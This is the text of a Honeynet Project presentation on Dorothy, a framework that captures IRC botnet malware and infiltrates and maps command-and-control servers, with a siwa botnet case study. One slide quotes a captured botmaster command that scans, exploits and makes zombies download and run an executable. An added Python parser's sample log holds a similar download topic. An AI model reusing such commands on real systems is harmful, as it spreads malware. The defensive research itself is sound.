An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization
Marco Riccardi – Italian Chapter – The Honeynet Project
Marco Cremonini – Dept. of Information Technology – Università di Milano
Defining the problem: IRC botnets
Defining the goal to achieve
The proposed solution: the Dorothy Framework
The realized proof of concept: honey-dorothy
Results
Case study: the siwa botnet
Workplan
Conclusions
Botnets are considered one of the most dangerous threats
◦ Hard to keep pace with their evolution
◦ Hard to protect against their attacks
◦ Hard to mitigate
The time between Command and Control (C&C) identification and botnet mitigation is typically too long
◦ Technical issues
◦ Legal issues
A mitigation plan should be as quick as possible
Automation is required
…otherwise, human interaction is needed
◦ Considering the social context (legal, economic, operational, cultural, etc.)
◦ All countermeasures provided by ISPs/LEOs (blacklisting, DNS update, etc.) must be clearly justified before their implementation
Goal: developing a framework that automatically provides all the information needed by an ISP/LEO to activate a mitigation strategy
Automated framework for IRC botnet analysis
◦ Automatic malware acquisition & analysis
◦ Automatic C&C IRC channel infiltration
◦ Automatic reporting of activity status
Interactive graphic front-end
Real-time information about monitored C&Cs
◦ Defenders can use this information to develop timely countermeasures to mitigate the risks
Customizable
◦ Defenders can be alerted when botnet activity is detected in their network
Malware Collection Module
Virtual Honeypot Injection Module
Network Analysis Module
Data Extraction Module
Infiltration Module
Geolocation Module
Live Data Extraction Module
Data Visualization Module
Web Graphical User Interface
Proposed proof of concept
Developed using the bash scripting language
◦ Fully compatible with POSIX systems
◦ Fully automated
Developed to be modular
◦ Easy integration with other tools
◦ Customizable
90% of its components are open source
The Virtualization Module has been developed on VMware
◦ A migration to VirtualBox is ongoing
Low-interaction honeypots (nepenthes)
All honeypots upload their malware to a central malware repository
Support for the Mwcollect Alliance repository has recently been added
Integration of a malware analysis module (static/dynamic) is ongoing
The virtualization environment has been developed on VMware
◦ vmtools support the scripting implementation
The malware is executed on a virtual machine (Win XP SP2)
After three minutes the VM is reverted to its original snapshot
Inspects the zombie's network behavior during the three minutes of infected VM execution
The network traffic is sniffed with tcpdump
The output is stored in a dump file and sent to the next module
The goal of this module is to extract all relevant information about C&Cs
The extracted information is used for botnet classification:
◦ C&C IP addresses
◦ C&C satellites
◦ Associated hostnames
◦ Hostnames resolved by DNS servers
Infiltrate, Observe, Report
IRC-drone
◦ Written entirely in bash
◦ Multichannel support
◦ Auto-responds to PING requests
◦ The drone injects all the IRC commands extracted from the traffic generated by the VM zombies as is, so it is also compatible with non-IRC-compliant C&Cs
The connection toward the C&C is anonymized through the Tor network
All data received from and sent to C&Cs are logged to txt files
Instant notification by email when:
◦ the topic changes
◦ a new command is issued by the botmaster
◦ a MODE option is modified
A full re-engineering of the module is ongoing
◦ Multiplatform
◦ Support for more onion networks
Geolocation information gives an approximate geographical location of C&Cs
◦ Useful for considering the social context
◦ Useful for understanding which law enforcement officer to notify
Provided by GeoCityLite
◦ Free, good approximation
All log files generated by the IRC-drone are parsed:
◦ Topic extraction
◦ Botmaster nickname / user host extraction
◦ Time delay calculation: between each topic modification and between each PING request (i.e. the heartbeat)
Parameters: IPs, Hosts, Ports, Zombies, Malwares, Chans, Satellites, ALL-Hosts, Mail Addr
Node legend (shape and color):
◦ Circle – Targets
◦ Circle – C&C
◦ Circle – Satellites
◦ Circle – Spreading
◦ Circle – Spam
◦ Square – Services
◦ Triangle – Source
“Overview first, zoom and filter, then details on-demand”
B. Shneiderman. The Eyes Have It: A Task by Data Type Taxonomy for Information Visualizations.
Tested for a period of 27 days between January and March 2009
Two public IPs used for malware acquisition
3900 malware samples downloaded
◦ 304 unique
◦ 562,657 Mb downloaded
16 unique C&Cs classified
◦ 50 IRC channels monitored
8992 unique public IPs identified as zombies
Formed by 5 C&C servers
◦ 2 located in China
◦ 2 located in Canada
◦ 1 located in Holland
7 different channel names used
◦ #siwa was the most used
37 different C&C satellites providing a botnet update service through HTTP
42 hostnames related to siwa IP addresses
4346 unique IP addresses identified as zombies
Redesign of the information flow management
◦ Information repository stored in a relational database
Evaluate developing the core engine in other programming languages
Integration of a malware analysis module
◦ Dynamic & static analysis
Virtual Honeypot: migration to VirtualBox
New module design and realization
◦ A module for analyzing P2P botnets
◦ A spam-trap implementation is ongoing
Development of a new IRC Drone
◦ Multiplatform, distributed
Data visualization tuning
◦ Investigating new ways of representing botnet data
Developing a new web interface
◦ More dynamic
◦ Multi-user / user customizable
Improve the notification process
◦ Mailing list
◦ Web 2.0 communication channels (twitter, feeds, blogs, ..)
The Dorothy Project is an ongoing activity of the Italian Honeynet Project (IHP) Chapter
Today, there are different contributors supporting the project:
◦ Two researchers of the University of Pavia are contributing by integrating their own botnet analysis tool (H.I.V.E) with honey-dorothy
◦ Three students from the University of Milan are developing new malware analysis modules
◦ The IHP Chapter has ten active participants who are contributing to the realization of a new version of the botnet analysis framework
…we hope to receive your support too!
The Italian Honeynet Chapter – www.honeynet.it
Marco Riccardi – marco.riccardi [at] honeynet [dot] it
Marco Cremonini – marco.cremonini [at] unimi [dot] it
Botmaster execution request:
##pi## :* ipscan s.s dcom2 -s ][ * wormride on -s ][ * download http://72.xxx.xxx.xxx/mb2.exe -e –s
Zombies' response:
72.xxx.xxx.xxx:2293 --> :QfNUXNcm!~xqbmgz@92.xxx.xxx.xxx PRIVMSG ##RUSSIA## :-041- Running FTP wormride thread
72.xxx.xxx.xxx:2293 --> :Tdkzdtwh!~bxoluj@mna75-4-82-225-77-1.yyy.yyy.net PRIVMSG ##russia## :-04wormride- 1. tftp transfer to 82.xxx.xxx.xxx complete
• Bar charts: number of DNS queries executed by the analyzed malware, grouped by C&C
• Pie charts: number of DNS queries
• Topic activity: average time between TOPIC changes
• C&C heartbeat: average time between two PING requests
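The live data extraction step behind these charts (topic and botmaster nick/host extraction, the alert events that trigger the email notifications, and the TOPIC and PING time averages), as an added Python example; it is not code from the Dorothy framework, whose drone and parsers are bash scripts. The log layout "epoch src:port --> raw IRC line" and the sample lines are constructed assumptions modelled on the drone output shown on the previous slide.

```python
import re
# Constructed sample of IRC-drone log lines, not real drone output. The layout
# "epoch src:port --> raw IRC line" is an assumption; addresses are documentation ranges.
SAMPLE_LOG = """\
1233000000 192.0.2.10:6667 --> PING :irc.example.test
1233000060 192.0.2.10:6667 --> PING :irc.example.test
1233000065 192.0.2.10:6667 --> :master!~op@198.51.100.7 TOPIC #siwa :.download http://198.51.100.9/upd.exe
1233000120 192.0.2.10:6667 --> PING :irc.example.test
1233000130 192.0.2.10:6667 --> :master!~op@198.51.100.7 MODE #siwa +m
1233000300 192.0.2.10:6667 --> :master!~op@198.51.100.7 TOPIC #siwa :.scan stop
1233000301 192.0.2.10:6667 --> :bot1!~x@203.0.113.5 PRIVMSG #siwa :-scan- stopped
"""

LINE_RE = re.compile(r"^(?P<ts>\d+) (?P<src>\S+) --> (?P<msg>.*)$")
# :nick!user@host COMMAND target [:trailing]
PREFIX_RE = re.compile(r"^:(?P<nick>[^!\s]+)!(?P<user>[^@\s]+)@(?P<host>\S+) "
                       r"(?P<cmd>[A-Z]+) (?P<chan>\S+)(?: :?(?P<args>.*))?$")

def mean_interval(timestamps):
    # average gap in seconds between consecutive events, None if fewer than two
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    return sum(gaps) / len(gaps) if gaps else None

def parse_drone_log(text):
    # returns botmasters, alert-worthy events and the TOPIC / PING timing averages
    pings, topic_ts, alerts, botmasters = [], [], [], set()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m: continue  # not in the drone's log layout
        ts, msg = int(m["ts"]), m["msg"]
        if msg.startswith("PING"):  # server heartbeat
            pings.append(ts)
            continue
        p = PREFIX_RE.match(msg)
        if not p: continue
        who = (p["nick"], p["user"], p["host"])
        if p["cmd"] == "TOPIC":  # whoever sets the topic is treated as the botmaster
            topic_ts.append(ts)
            botmasters.add(who)
            alerts.append(f"TOPIC {p['chan']} by {p['nick']}: {p['args']}")
        elif p["cmd"] == "MODE":
            alerts.append(f"MODE {p['chan']} by {p['nick']}: {p['args']}")
        elif p["cmd"] == "PRIVMSG" and who in botmasters:
            alerts.append(f"COMMAND {p['chan']} by {p['nick']}: {p['args']}")
    return {
        "botmasters": sorted(botmasters),
        "alerts": alerts,  # the framework mails these; here they are returned
        "mean_topic_interval": mean_interval(topic_ts),
        "mean_ping_interval": mean_interval(pings),
    }
```

Replies from ordinary bots (such as the bot1 line) are kept out of the alert list, so only activity attributable to the botmaster reaches the notification step.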
A full re-engineering of the module is ongoing
◦ The new drone will be multiplatform
◦ Anyone can support the infiltration process
◦ It will support more than one onion network
◦ It will send its logs to a central log concentrator
◦ Integrity and confidentiality have to be managed accurately